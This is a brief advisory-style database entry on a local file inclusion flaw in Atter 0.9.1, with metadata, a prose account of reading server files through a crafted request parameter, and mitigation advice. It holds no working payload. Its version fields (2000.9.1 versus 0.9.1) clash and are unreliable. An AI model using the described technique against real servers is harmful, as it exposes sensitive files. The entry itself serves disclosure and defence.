Vendor: Atter
By: KnocKout
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 98
Product Name: Atter
Affected Version From: 2000.9.1
Affected Version To: 2000.9.1
Patch Exists: NO
Related CWE: N/A
CPE: a:atter:atter:0.9.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Atter 0.9.1 Local File Inclusion Vulnerability
Atter 0.9.1 is vulnerable to local file inclusion. An attacker can exploit it by sending a crafted HTTP request to the vulnerable server, in which a parameter value points to a local file on the server. This allows the attacker to read the contents of that file and gain access to sensitive information.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a file path. Also, ensure that the web server is configured to deny access to files outside of the web root directory.